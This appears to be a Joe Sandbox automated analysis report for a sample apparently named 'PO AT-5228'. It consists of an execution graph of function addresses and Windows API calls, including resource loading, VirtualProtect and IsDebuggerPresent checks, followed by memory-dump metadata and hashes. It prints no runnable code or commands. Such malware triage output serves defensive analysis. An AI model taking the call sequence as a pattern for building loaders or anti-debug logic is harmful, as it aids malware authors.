                                                                                      Has exited:true

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.3%
                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                        Signature Coverage:5.1%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:48
94191->94193 94192 b7f4ea 48 API calls 94192->94193 94193->94189 94193->94192 94195 bc0a53 Mailbox 94194->94195 94201 bc084b _strcat _wcscpy __NMSG_WRITE 94194->94201 94195->94155 94196 b6cf93 58 API calls 94196->94201 94197 b6d286 48 API calls 94197->94201 94198 b6936c 81 API calls 94198->94201 94199 b8395c 47 API calls __crtLCMapStringA_stat 94199->94201 94201->94195 94201->94196 94201->94197 94201->94198 94201->94199 94262 ba8035 50 API calls __NMSG_WRITE 94201->94262 94204 b7ed2d 94202->94204 94203 b7edc5 VirtualProtect 94205 b7ed93 94203->94205 94204->94203 94204->94205 94205->94158 94205->94159 94207 b7c064 94206->94207 94209 b7c069 Mailbox 94206->94209 94263 b7c1af 48 API calls 94207->94263 94211 b7c077 94209->94211 94264 b7c15c 48 API calls 94209->94264 94212 b7f4ea 48 API calls 94211->94212 94213 b7c152 94211->94213 94214 b7c108 94212->94214 94213->94163 94215 b7f4ea 48 API calls 94214->94215 94216 b7c113 94215->94216 94216->94163 94218 b71cf6 94217->94218 94221 b71ba2 94217->94221 94218->94173 94219 b71bae 94225 b71bb9 94219->94225 94266 b7c15c 48 API calls 94219->94266 94221->94219 94222 b7f4ea 48 API calls 94221->94222 94223 bd49c4 94222->94223 94226 b7f4ea 48 API calls 94223->94226 94224 b71c5d 94224->94173 94225->94224 94227 b7f4ea 48 API calls 94225->94227 94232 bd49cf 94226->94232 94228 b71c9f 94227->94228 94229 b71cb2 94228->94229 94265 b62925 48 API calls 94228->94265 94229->94173 94231 b7f4ea 48 API calls 94231->94232 94232->94219 94232->94231 94234 bc0427 94233->94234 94239 bc0443 94233->94239 94235 bc042e 94234->94235 94236 bc044f 94234->94236 94237 bc04f8 94234->94237 94234->94239 94273 ba7c56 50 API calls _strlen 94235->94273 94243 b6cdb9 48 API calls 94236->94243 94288 ba9dc5 103 API calls 94237->94288 94238 bc051e 94238->94173 94239->94238 94267 b81c9d 94239->94267 94243->94239 94244 bc0438 94274 b6cdb9 94244->94274 94246->94160 94247->94160 94248->94164 94249->94173 94250->94147 94253 ba1f3b __NMSG_WRITE 94251->94253 94252 ba1f79 
94252->94181 94252->94186 94253->94252 94254 ba1f6f 94253->94254 94256 ba1ffa 94253->94256 94254->94252 94260 b7d37a 60 API calls 94254->94260 94256->94252 94261 b7d37a 60 API calls 94256->94261 94258->94184 94259->94187 94260->94254 94261->94256 94262->94201 94263->94209 94264->94211 94265->94229 94266->94225 94268 b81ccf _free 94267->94268 94269 b81ca6 RtlFreeHeap 94267->94269 94268->94238 94269->94268 94270 b81cbb 94269->94270 94289 b87c0e 47 API calls __getptd_noexit 94270->94289 94272 b81cc1 GetLastError 94272->94268 94273->94244 94275 b6cdc5 94274->94275 94276 b6cdfb 94274->94276 94281 b7f4ea 48 API calls 94275->94281 94277 b6ce04 94276->94277 94278 b6ce0e 94276->94278 94279 b66a63 48 API calls 94277->94279 94280 b6bcce 48 API calls 94278->94280 94283 b6cdf1 94279->94283 94280->94283 94282 b6cdd8 94281->94282 94284 b6cde3 94282->94284 94285 bd4621 94282->94285 94283->94239 94284->94283 94287 b6ce19 48 API calls 94284->94287 94285->94283 94286 b6d7f7 48 API calls 94285->94286 94286->94283 94287->94283 94288->94239 94289->94272 94291 b7e547 94290->94291 94292 b7e535 94290->94292 94295 b6bcce 48 API calls 94291->94295 94293 b7e541 94292->94293 94294 b7e53b 94292->94294 94297 b7e63a 48 API calls 94293->94297 94320 b7e63a 94294->94320 94305 ba5a81 94295->94305 94300 ba5c17 94297->94300 94298 ba5ab0 94298->93892 94303 b6bf20 50 API calls 94300->94303 94304 ba5c25 94303->94304 94312 ba5c35 Mailbox 94304->94312 94341 ba5cf1 50 API calls 94304->94341 94305->94298 94339 ba5a27 SetFilePointerEx ReadFile 94305->94339 94340 b6c799 48 API calls _memcpy_s 94305->94340 94307 bd40c9 94311 b7e581 Mailbox 94311->93892 94312->93892 94313->93868 94314->93895 94315->93896 94316->93867 94317->93867 94318->93889 94319->93894 94321 b7f4ea 48 API calls 94320->94321 94322 b7e64d 94321->94322 94323 b66b4a 48 API calls 94322->94323 94324 b7e55f 94323->94324 94325 b6bf20 94324->94325 94342 b6c1c2 94325->94342 94327 b6c2e0 2 API calls 94330 b6bf31 94327->94330 94328 b6bf66 94328->94307 
94331 b6c1de MultiByteToWideChar 94328->94331 94330->94327 94330->94328 94349 b6bf71 48 API calls _memcpy_s 94330->94349 94332 b6c245 94331->94332 94333 b6c201 94331->94333 94335 b6bcce 48 API calls 94332->94335 94334 b7f4ea 48 API calls 94333->94334 94336 b6c216 MultiByteToWideChar 94334->94336 94338 b6c237 94335->94338 94350 b6c24f 94336->94350 94338->94311 94339->94305 94340->94305 94341->94312 94343 bd3e49 94342->94343 94344 b6c1d3 94342->94344 94345 b66b4a 48 API calls 94343->94345 94344->94330 94346 bd3e53 94345->94346 94347 b7f4ea 48 API calls 94346->94347 94348 bd3e5f 94347->94348 94349->94330 94351 b6c2d1 94350->94351 94352 b6c25e 94350->94352 94353 b6b18b 48 API calls 94351->94353 94352->94351 94354 b6c26a 94352->94354 94361 b6c27c _memcpy_s 94353->94361 94355 b6c274 94354->94355 94356 b6c2a2 94354->94356 94362 b6c369 48 API calls 94355->94362 94358 b66b4a 48 API calls 94356->94358 94359 b6c2ac 94358->94359 94360 b7f4ea 48 API calls 94359->94360 94360->94361 94361->94338 94362->94361 94391 b66b0f 94363->94391 94365 b6b69b 94398 b6ba85 48 API calls _memcpy_s 94365->94398 94367 b6b6b5 Mailbox 94367->93905 94370 b6b495 94370->94365 94371 bd3939 _memcpy_s 94370->94371 94372 bd397b 94370->94372 94375 b6b9e4 94370->94375 94378 b6ba85 48 API calls 94370->94378 94380 b6bcce 48 API calls 94370->94380 94383 bd3909 94370->94383 94384 b6bb85 48 API calls 94370->94384 94388 b6bdfa 48 API calls 94370->94388 94396 b6c413 59 API calls 94370->94396 94397 b6bc74 48 API calls 94370->94397 94399 b6c6a5 49 API calls 94370->94399 94400 b6c799 48 API calls _memcpy_s 94370->94400 94401 ba26bc 88 API calls 4 library calls 94371->94401 94402 ba26bc 88 API calls 4 library calls 94372->94402 94404 ba26bc 88 API calls 4 library calls 94375->94404 94376 bd3973 94376->94367 94378->94370 94380->94370 94381 bd3989 94403 b6ba85 48 API calls _memcpy_s 94381->94403 94385 b66b4a 48 API calls 94383->94385 94384->94370 94387 bd3914 94385->94387 94390 b7f4ea 48 API calls 94387->94390 94389 
b6b66c CharUpperBuffW 94388->94389 94389->94370 94390->94371 94392 b7f4ea 48 API calls 94391->94392 94393 b66b34 94392->94393 94394 b66b4a 48 API calls 94393->94394 94395 b66b43 94394->94395 94395->94370 94396->94370 94397->94370 94398->94367 94399->94370 94400->94370 94401->94376 94402->94381 94403->94376 94404->94376 94406 b6d654 94405->94406 94414 b6d67e 94405->94414 94407 b6d65b 94406->94407 94410 b6d6c2 94406->94410 94408 b6d6ab 94407->94408 94409 b6d666 94407->94409 94408->94414 94420 b7dce0 53 API calls 94408->94420 94419 b6d9a0 53 API calls __cinit 94409->94419 94410->94408 94421 b7dce0 53 API calls 94410->94421 94414->93938 94415->93938 94416->93919 94417->93919 94418->93920 94419->94414 94420->94414 94421->94408 94422->93980 94423->93952 94424->93959 94426 b74637 94425->94426 94427 b7479f 94425->94427 94428 b74643 94426->94428 94429 bd6e05 94426->94429 94430 b6ce19 48 API calls 94427->94430 94523 b74300 335 API calls _memcpy_s 94428->94523 94432 bbe822 335 API calls 94429->94432 94437 b746e4 Mailbox 94430->94437 94434 bd6e11 94432->94434 94433 b74739 Mailbox 94433->93980 94434->94433 94524 bacc5c 86 API calls 4 library calls 94434->94524 94436 b74659 94436->94433 94436->94434 94436->94437 94440 bb6ff0 335 API calls 94437->94440 94473 bafa0c 94437->94473 94514 b64252 94437->94514 94520 ba6524 94437->94520 94440->94433 94442->93964 94443->93968 95501 b6bd30 94444->95501 94446 b73267 94458 b73313 _memcpy_s Mailbox 94446->94458 95574 b7c36b 86 API calls 94446->95574 94448 b7c3c3 48 API calls 94448->94458 94451 b6d645 53 API calls 94451->94458 94457 b6fe30 335 API calls 94457->94458 94458->94448 94458->94451 94458->94457 94460 bacc5c 86 API calls 94458->94460 94461 b6dcae 50 API calls 94458->94461 94465 b7c2d6 48 API calls 94458->94465 94466 b66eed 48 API calls 94458->94466 94468 b7f4ea 48 API calls 94458->94468 94469 b73635 Mailbox 94458->94469 95506 b62b7a 94458->95506 95513 b6e8d0 94458->95513 95575 b6d9a0 53 API calls __cinit 94458->95575 95576 b6d8c0 53 
API calls 94458->95576 95577 bbf320 335 API calls 94458->95577 95578 bbf5ee 335 API calls 94458->95578 95579 b61caa 49 API calls 94458->95579 95580 bbcda2 82 API calls Mailbox 94458->95580 95581 ba80e3 53 API calls 94458->95581 95582 b6d764 55 API calls 94458->95582 95583 b6d6e9 94458->95583 95587 bac942 50 API calls 94458->95587 94460->94458 94461->94458 94465->94458 94466->94458 94468->94458 94469->93980 94470->93978 94471->93981 94472->93985 94474 bafa1c __ftell_nolock 94473->94474 94475 bafa44 94474->94475 94476 b6d286 48 API calls 94474->94476 94477 b6936c 81 API calls 94475->94477 94476->94475 94478 bafa5e 94477->94478 94479 bafb68 94478->94479 94480 bafa80 94478->94480 94489 bafb92 94478->94489 94525 b641a9 94479->94525 94482 b6936c 81 API calls 94480->94482 94487 bafa8c _wcscpy _wcschr 94482->94487 94484 bafb8e 94486 b6936c 81 API calls 94484->94486 94484->94489 94485 b641a9 136 API calls 94485->94484 94488 bafbc7 94486->94488 94493 bafab0 _wcscat _wcscpy 94487->94493 94497 bafade _wcscat 94487->94497 94490 b81dfc __wsplitpath 47 API calls 94488->94490 94489->94433 94498 bafbeb _wcscat _wcscpy 94490->94498 94491 b6936c 81 API calls 94492 bafafc _wcscpy 94491->94492 94610 ba72cb GetFileAttributesW 94492->94610 94495 b6936c 81 API calls 94493->94495 94495->94497 94496 bafb1c __NMSG_WRITE 94496->94489 94499 b6936c 81 API calls 94496->94499 94497->94491 94502 b6936c 81 API calls 94498->94502 94500 bafb48 94499->94500 94611 ba60dd 77 API calls 4 library calls 94500->94611 94504 bafc82 94502->94504 94503 bafb5c 94503->94489 94549 ba690b 94504->94549 94506 bafca2 94507 ba6524 3 API calls 94506->94507 94508 bafcb1 94507->94508 94509 b6936c 81 API calls 94508->94509 94512 bafce2 94508->94512 94510 bafccb 94509->94510 94555 babfa4 94510->94555 94513 b64252 84 API calls 94512->94513 94513->94489 94515 b6425c 94514->94515 94517 b64263 94514->94517 94516 b835e4 __fcloseall 83 API calls 94515->94516 94516->94517 94518 b64272 94517->94518 94519 b64283 FreeLibrary 
94517->94519 94518->94433 94519->94518 95497 ba6ca9 GetFileAttributesW 94520->95497 94523->94436 94524->94433 94612 b64214 94525->94612 94530 b641d4 LoadLibraryExW 94622 b64291 94530->94622 94531 bd4f73 94533 b64252 84 API calls 94531->94533 94534 bd4f7a 94533->94534 94536 b64291 3 API calls 94534->94536 94538 bd4f82 94536->94538 94648 b644ed 94538->94648 94539 b641fb 94539->94538 94540 b64207 94539->94540 94542 b64252 84 API calls 94540->94542 94544 b6420c 94542->94544 94544->94484 94544->94485 94546 bd4fa9 94654 b64950 94546->94654 94550 ba6918 _wcschr __ftell_nolock 94549->94550 94551 b81dfc __wsplitpath 47 API calls 94550->94551 94554 ba692e _wcscat _wcscpy 94550->94554 94552 ba695d 94551->94552 94553 b81dfc __wsplitpath 47 API calls 94552->94553 94553->94554 94554->94506 94556 babfb1 __ftell_nolock 94555->94556 94557 b7f4ea 48 API calls 94556->94557 94558 bac00e 94557->94558 94559 b647b7 48 API calls 94558->94559 94560 bac018 94559->94560 95121 babdb4 94560->95121 94562 bac023 94563 b64517 83 API calls 94562->94563 94564 bac036 _wcscmp 94563->94564 94565 bac05a 94564->94565 94566 bac107 94564->94566 95154 bac56d 94 API calls 2 library calls 94565->95154 95155 bac56d 94 API calls 2 library calls 94566->95155 94569 bac05f 94570 b81dfc __wsplitpath 47 API calls 94569->94570 94573 bac110 94569->94573 94575 bac088 _wcscat _wcscpy 94570->94575 94571 b644ed 64 API calls 94572 bac12c 94571->94572 94574 b644ed 64 API calls 94572->94574 94573->94512 94576 bac13c 94574->94576 94578 b81dfc __wsplitpath 47 API calls 94575->94578 94577 b644ed 64 API calls 94576->94577 94579 bac157 94577->94579 94583 bac0d3 _wcscat 94578->94583 94580 b644ed 64 API calls 94579->94580 94581 bac167 94580->94581 94582 b644ed 64 API calls 94581->94582 94584 bac182 94582->94584 94583->94571 94583->94573 94585 b644ed 64 API calls 94584->94585 94586 bac192 94585->94586 94587 b644ed 64 API calls 94586->94587 94588 bac1a2 94587->94588 94589 b644ed 64 API calls 94588->94589 94590 bac1b2 94589->94590 
95124 bac71a GetTempPathW GetTempFileNameW 94590->95124 94592 bac1be 94610->94496 94611->94503 94659 b64339 94612->94659 94616 b64244 FreeLibrary 94617 b641bb 94616->94617 94619 b83499 94617->94619 94618 b6423c 94618->94616 94618->94617 94667 b834ae 94619->94667 94621 b641c8 94621->94530 94621->94531 94864 b642e4 94622->94864 94625 b642b8 94627 b642c1 FreeLibrary 94625->94627 94628 b641ec 94625->94628 94627->94628 94629 b64380 94628->94629 94630 b7f4ea 48 API calls 94629->94630 94631 b64395 94630->94631 94632 b647b7 48 API calls 94631->94632 94633 b643a1 _memcpy_s 94632->94633 94634 b643dc 94633->94634 94636 b644d1 94633->94636 94637 b64499 94633->94637 94635 b64950 57 API calls 94634->94635 94645 b643e5 94635->94645 94883 bac750 93 API calls 94636->94883 94872 b6406b CreateStreamOnHGlobal 94637->94872 94640 b644ed 64 API calls 94640->94645 94642 b64479 94642->94539 94643 bd4ed7 94644 b64517 83 API calls 94643->94644 94646 bd4eeb 94644->94646 94645->94640 94645->94642 94645->94643 94878 b64517 94645->94878 94647 b644ed 64 API calls 94646->94647 94647->94642 94649 b644ff 94648->94649 94650 bd4fc0 94648->94650 94907 b8381e 94649->94907 94653 babf5a GetSystemTimeAsFileTime 94653->94546 94655 b6495f 94654->94655 94656 bd5002 94654->94656 95103 b83e65 94655->95103 94658 b64967 94663 b6434b 94659->94663 94662 b64321 LoadLibraryA GetProcAddress 94662->94618 94664 b6422f 94663->94664 94665 b64354 LoadLibraryA 94663->94665 94664->94618 94664->94662 94665->94664 94666 b64365 GetProcAddress 94665->94666 94666->94664 94670 b834ba __lseeki64 94667->94670 94668 b834cd 94715 b87c0e 47 API calls __getptd_noexit 94668->94715 94670->94668 94672 b834fe 94670->94672 94671 b834d2 94716 b86e10 8 API calls __cftoe2_l 94671->94716 94686 b8e4c8 94672->94686 94675 b83503 94676 b83519 94675->94676 94677 b8350c 94675->94677 94679 b83543 94676->94679 94680 b83523 94676->94680 94717 b87c0e 47 API calls __getptd_noexit 94677->94717 94700 b8e5e0 94679->94700 94718 b87c0e 47 API calls 
__getptd_noexit 94680->94718 94682 b834dd __lseeki64 @_EH4_CallFilterFunc@8 94682->94621 94687 b8e4d4 __lseeki64 94686->94687 94720 b87cf4 94687->94720 94689 b8e4e2 94690 b8e559 94689->94690 94698 b8e552 94689->94698 94730 b87d7c 94689->94730 94753 b84e5b 48 API calls __lock 94689->94753 94754 b84ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94689->94754 94755 b869d0 94690->94755 94694 b8e5cc __lseeki64 94694->94675 94695 b8e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94695->94698 94727 b8e5d7 94698->94727 94709 b8e600 __wopenfile 94700->94709 94701 b8e61a 94771 b87c0e 47 API calls __getptd_noexit 94701->94771 94702 b8e7d5 94702->94701 94706 b8e838 94702->94706 94704 b8e61f 94772 b86e10 8 API calls __cftoe2_l 94704->94772 94768 b963c9 94706->94768 94707 b8354e 94719 b83570 LeaveCriticalSection LeaveCriticalSection _fprintf 94707->94719 94709->94701 94709->94702 94773 b8185b 59 API calls 2 library calls 94709->94773 94711 b8e7ce 94711->94702 94774 b8185b 59 API calls 2 library calls 94711->94774 94713 b8e7ed 94713->94702 94775 b8185b 59 API calls 2 library calls 94713->94775 94715->94671 94716->94682 94717->94682 94718->94682 94719->94682 94721 b87d18 EnterCriticalSection 94720->94721 94722 b87d05 94720->94722 94721->94689 94723 b87d7c __mtinitlocknum 46 API calls 94722->94723 94724 b87d0b 94723->94724 94724->94721 94761 b8115b 47 API calls 3 library calls 94724->94761 94762 b87e58 LeaveCriticalSection 94727->94762 94729 b8e5de 94729->94694 94731 b87d88 __lseeki64 94730->94731 94732 b87d91 94731->94732 94734 b87da9 94731->94734 94763 b881c2 47 API calls __NMSG_WRITE 94732->94763 94736 b869d0 __malloc_crt 46 API calls 94734->94736 94740 b87dc9 __lseeki64 94734->94740 94735 b87d96 94764 b8821f 47 API calls 6 library calls 94735->94764 94738 b87dbd 94736->94738 94741 b87dd3 94738->94741 94742 b87dc4 94738->94742 94739 b87d9d 94765 b81145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94739->94765 94740->94689 94745 b87cf4 
__lock 46 API calls 94741->94745 94766 b87c0e 47 API calls __getptd_noexit 94742->94766 94747 b87dda 94745->94747 94748 b87de9 InitializeCriticalSectionAndSpinCount 94747->94748 94749 b87dfe 94747->94749 94750 b87e04 94748->94750 94751 b81c9d _free 46 API calls 94749->94751 94767 b87e1a LeaveCriticalSection _doexit 94750->94767 94751->94750 94753->94689 94754->94689 94757 b869de 94755->94757 94756 b8395c __crtLCMapStringA_stat 46 API calls 94756->94757 94757->94756 94758 b86a12 94757->94758 94759 b869f1 Sleep 94757->94759 94758->94695 94758->94698 94760 b86a0a 94759->94760 94760->94757 94760->94758 94762->94729 94763->94735 94764->94739 94766->94740 94767->94740 94776 b95bb1 94768->94776 94770 b963e2 94770->94707 94771->94704 94772->94707 94773->94711 94774->94713 94775->94702 94777 b95bbd __lseeki64 94776->94777 94778 b95bcf 94777->94778 94781 b95c06 94777->94781 94861 b87c0e 47 API calls __getptd_noexit 94778->94861 94780 b95bd4 94862 b86e10 8 API calls __cftoe2_l 94780->94862 94787 b95c78 94781->94787 94784 b95c23 94863 b95c4c LeaveCriticalSection __unlock_fhandle 94784->94863 94786 b95bde __lseeki64 94786->94770 94788 b95c98 94787->94788 94789 b8273b __wsopen_helper 47 API calls 94788->94789 94792 b95cb4 94789->94792 94790 b86e20 __invoke_watson 8 API calls 94791 b963c8 94790->94791 94794 b95bb1 __wsopen_helper 104 API calls 94791->94794 94793 b95cee 94792->94793 94798 b95d11 94792->94798 94810 b95deb 94792->94810 94795 b87bda __chsize_nolock 47 API calls 94793->94795 94796 b963e2 94794->94796 94797 b95cf3 94795->94797 94796->94784 94799 b87c0e __cftoe2_l 47 API calls 94797->94799 94801 b95dcf 94798->94801 94809 b95dad 94798->94809 94800 b95d00 94799->94800 94802 b86e10 __cftoe2_l 8 API calls 94800->94802 94803 b87bda __chsize_nolock 47 API calls 94801->94803 94805 b95d0a 94802->94805 94804 b95dd4 94803->94804 94806 b87c0e __cftoe2_l 47 API calls 94804->94806 94805->94784 94807 b95de1 94806->94807 94808 b86e10 __cftoe2_l 8 API calls 94807->94808 94808->94810 
94811 b8a979 __wsopen_helper 52 API calls 94809->94811 94810->94790 94812 b95e7b 94811->94812 94813 b95e85 94812->94813 94814 b95ea6 94812->94814 94815 b87bda __chsize_nolock 47 API calls 94813->94815 94816 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94814->94816 94817 b95e8a 94815->94817 94827 b95ec8 94816->94827 94818 b87c0e __cftoe2_l 47 API calls 94817->94818 94820 b95e94 94818->94820 94819 b95f46 GetFileType 94821 b95f51 GetLastError 94819->94821 94822 b95f93 94819->94822 94825 b87c0e __cftoe2_l 47 API calls 94820->94825 94826 b87bed __dosmaperr 47 API calls 94821->94826 94831 b8ac0b __set_osfhnd 48 API calls 94822->94831 94823 b95f14 GetLastError 94824 b87bed __dosmaperr 47 API calls 94823->94824 94828 b95f39 94824->94828 94825->94805 94829 b95f78 CloseHandle 94826->94829 94827->94819 94827->94823 94830 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94827->94830 94834 b87c0e __cftoe2_l 47 API calls 94828->94834 94829->94828 94832 b95f86 94829->94832 94833 b95f09 94830->94833 94838 b95fb1 94831->94838 94835 b87c0e __cftoe2_l 47 API calls 94832->94835 94833->94819 94833->94823 94834->94810 94836 b95f8b 94835->94836 94836->94828 94837 b9616c 94837->94810 94840 b9633f CloseHandle 94837->94840 94838->94837 94839 b8f82f __lseeki64_nolock 49 API calls 94838->94839 94855 b96032 94838->94855 94841 b9601b 94839->94841 94842 b95b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94840->94842 94844 b87bda __chsize_nolock 47 API calls 94841->94844 94841->94855 94843 b96366 94842->94843 94845 b9636e GetLastError 94843->94845 94846 b9639a 94843->94846 94844->94855 94847 b87bed __dosmaperr 47 API calls 94845->94847 94846->94810 94850 b9637a 94847->94850 94848 b96064 94853 b96f40 __chsize_nolock 81 API calls 94848->94853 94848->94855 94849 b8f82f 49 API calls __lseeki64_nolock 94849->94855 94854 b8ab1e __free_osfhnd 48 API calls 94850->94854 94851 b8ee0e 59 API calls __filbuf 94851->94855 94852 b8ea9c __close_nolock 50 API 
calls 94852->94855 94853->94848 94854->94846 94855->94837 94855->94848 94855->94849 94855->94851 94855->94852 94856 b8af61 __flush 78 API calls 94855->94856 94857 b961e9 94855->94857 94856->94855 94858 b8ea9c __close_nolock 50 API calls 94857->94858 94859 b961f0 94858->94859 94860 b87c0e __cftoe2_l 47 API calls 94859->94860 94860->94810 94861->94780 94862->94786 94863->94786 94868 b642f6 94864->94868 94867 b642cc LoadLibraryA GetProcAddress 94867->94625 94869 b642aa 94868->94869 94870 b642ff LoadLibraryA 94868->94870 94869->94625 94869->94867 94870->94869 94871 b64310 GetProcAddress 94870->94871 94871->94869 94873 b64085 FindResourceExW 94872->94873 94877 b640a2 94872->94877 94874 bd4f16 LoadResource 94873->94874 94873->94877 94875 bd4f2b SizeofResource 94874->94875 94874->94877 94876 bd4f3f LockResource 94875->94876 94875->94877 94876->94877 94877->94634 94879 b64526 94878->94879 94882 bd4fe0 94878->94882 94884 b83a8d 94879->94884 94881 b64534 94881->94645 94883->94634 94885 b83a99 __lseeki64 94884->94885 94886 b83aa7 94885->94886 94887 b83acd 94885->94887 94897 b87c0e 47 API calls __getptd_noexit 94886->94897 94899 b84e1c 94887->94899 94890 b83aac 94898 b86e10 8 API calls __cftoe2_l 94890->94898 94894 b83ae2 94906 b83b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94894->94906 94896 b83ab7 __lseeki64 94896->94881 94897->94890 94898->94896 94900 b84e2c 94899->94900 94901 b84e4e EnterCriticalSection 94899->94901 94900->94901 94903 b84e34 94900->94903 94902 b83ad3 94901->94902 94905 b839fe 81 API calls 4 library calls 94902->94905 94904 b87cf4 __lock 47 API calls 94903->94904 94904->94902 94905->94894 94906->94896 94910 b83839 94907->94910 94909 b64510 94909->94653 94911 b83845 __lseeki64 94910->94911 94912 b83888 94911->94912 94913 b83880 __lseeki64 94911->94913 94915 b8385b _memset 94911->94915 94914 b84e1c __lock_file 48 API calls 94912->94914 94913->94909 94917 b8388e 94914->94917 94937 b87c0e 47 API calls __getptd_noexit 94915->94937 94923 b8365b 
94917->94923 94918 b83875 94938 b86e10 8 API calls __cftoe2_l 94918->94938 94926 b83676 _memset 94923->94926 94929 b83691 94923->94929 94924 b83681 95035 b87c0e 47 API calls __getptd_noexit 94924->95035 94926->94924 94926->94929 94934 b836cf 94926->94934 94927 b83686 95036 b86e10 8 API calls __cftoe2_l 94927->95036 94939 b838c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94929->94939 94931 b837e0 _memset 95038 b87c0e 47 API calls __getptd_noexit 94931->95038 94934->94929 94934->94931 94940 b82933 94934->94940 94947 b8ee0e 94934->94947 95015 b8eb66 94934->95015 95037 b8ec87 47 API calls 3 library calls 94934->95037 94937->94918 94938->94913 94939->94913 94941 b8293d 94940->94941 94942 b82952 94940->94942 95039 b87c0e 47 API calls __getptd_noexit 94941->95039 94942->94934 94944 b82942 95040 b86e10 8 API calls __cftoe2_l 94944->95040 94946 b8294d 94946->94934 94948 b8ee2f 94947->94948 94949 b8ee46 94947->94949 95050 b87bda 47 API calls __getptd_noexit 94948->95050 94950 b8f57e 94949->94950 94954 b8ee80 94949->94954 95065 b87bda 47 API calls __getptd_noexit 94950->95065 94953 b8ee34 95051 b87c0e 47 API calls __getptd_noexit 94953->95051 94957 b8ee88 94954->94957 94963 b8ee9f 94954->94963 94955 b8f583 95066 b87c0e 47 API calls __getptd_noexit 94955->95066 95052 b87bda 47 API calls __getptd_noexit 94957->95052 94960 b8ee94 95067 b86e10 8 API calls __cftoe2_l 94960->95067 94961 b8ee8d 95053 b87c0e 47 API calls __getptd_noexit 94961->95053 94964 b8eeb4 94963->94964 94965 b8eece 94963->94965 94968 b8eeec 94963->94968 94995 b8ee3b 94963->94995 95054 b87bda 47 API calls __getptd_noexit 94964->95054 94965->94964 94970 b8eed9 94965->94970 94969 b869d0 __malloc_crt 47 API calls 94968->94969 94971 b8eefc 94969->94971 95041 b93bf2 94970->95041 94974 b8ef1f 94971->94974 94975 b8ef04 94971->94975 94973 b8efed 94976 b8f066 ReadFile 94973->94976 94979 b8f003 GetConsoleMode 94973->94979 95057 b8f82f 49 API calls 3 library calls 94974->95057 95055 b87c0e 47 API calls 
__getptd_noexit 94975->95055 94980 b8f088 94976->94980 94981 b8f546 GetLastError 94976->94981 94983 b8f063 94979->94983 94984 b8f017 94979->94984 94980->94981 94988 b8f058 94980->94988 94985 b8f046 94981->94985 94986 b8f553 94981->94986 94982 b8ef09 95056 b87bda 47 API calls __getptd_noexit 94982->95056 94983->94976 94984->94983 94990 b8f01d ReadConsoleW 94984->94990 94997 b8f04c 94985->94997 95058 b87bed 47 API calls 3 library calls 94985->95058 95063 b87c0e 47 API calls __getptd_noexit 94986->95063 94988->94997 95000 b8f0bd 94988->95000 95001 b8f32a 94988->95001 94990->94988 94992 b8f040 GetLastError 94990->94992 94991 b8f558 95064 b87bda 47 API calls __getptd_noexit 94991->95064 94992->94985 94995->94934 94996 b81c9d _free 47 API calls 94996->94995 94997->94995 94997->94996 94999 b8f129 ReadFile 95003 b8f14a GetLastError 94999->95003 95013 b8f154 94999->95013 95000->94999 95008 b8f1aa 95000->95008 95001->94997 95002 b8f430 ReadFile 95001->95002 95007 b8f453 GetLastError 95002->95007 95014 b8f461 95002->95014 95003->95013 95004 b8f267 95009 b8f217 MultiByteToWideChar 95004->95009 95061 b8f82f 49 API calls 3 library calls 95004->95061 95005 b8f257 95060 b87c0e 47 API calls __getptd_noexit 95005->95060 95007->95014 95008->94997 95008->95004 95008->95005 95008->95009 95009->94992 95009->94997 95013->95000 95059 b8f82f 49 API calls 3 library calls 95013->95059 95014->95001 95062 b8f82f 49 API calls 3 library calls 95014->95062 95016 b8eb71 95015->95016 95020 b8eb86 95015->95020 95098 b87c0e 47 API calls __getptd_noexit 95016->95098 95018 b8eb76 95099 b86e10 8 API calls __cftoe2_l 95018->95099 95022 b8ebbb 95020->95022 95029 b8eb81 95020->95029 95100 b93e24 95020->95100 95023 b82933 __flush 47 API calls 95022->95023 95024 b8ebcf 95023->95024 95068 b8ed06 95024->95068 95026 b8ebd6 95027 b82933 __flush 47 API calls 95026->95027 95026->95029 95028 b8ebf9 95027->95028 95028->95029 95030 b82933 __flush 47 API calls 95028->95030 95029->94934 95031 b8ec05 95030->95031 

Control-flow Graph
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cc106b930daf16a3889c4a298858d2560fd2d99bf37a7fbf6baa6629476e362a
                                                                                        • Instruction ID: d126ee662214a208baa6440b7436d5b2d2ed625f81b75445ed34cb75b9628399
                                                                                        • Opcode Fuzzy Hash: cc106b930daf16a3889c4a298858d2560fd2d99bf37a7fbf6baa6629476e362a
                                                                                        • Instruction Fuzzy Hash: D9325F75B022188FDB24AF24DC81AE9B7F5FF46310F1841D9E40AA7A61D7709E81CF52

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B63AA3,?), ref: 00B63D45
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00B63AA3,?), ref: 00B63D57
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C21148,00C21130,?,?,?,?,00B63AA3,?), ref: 00B63DC8
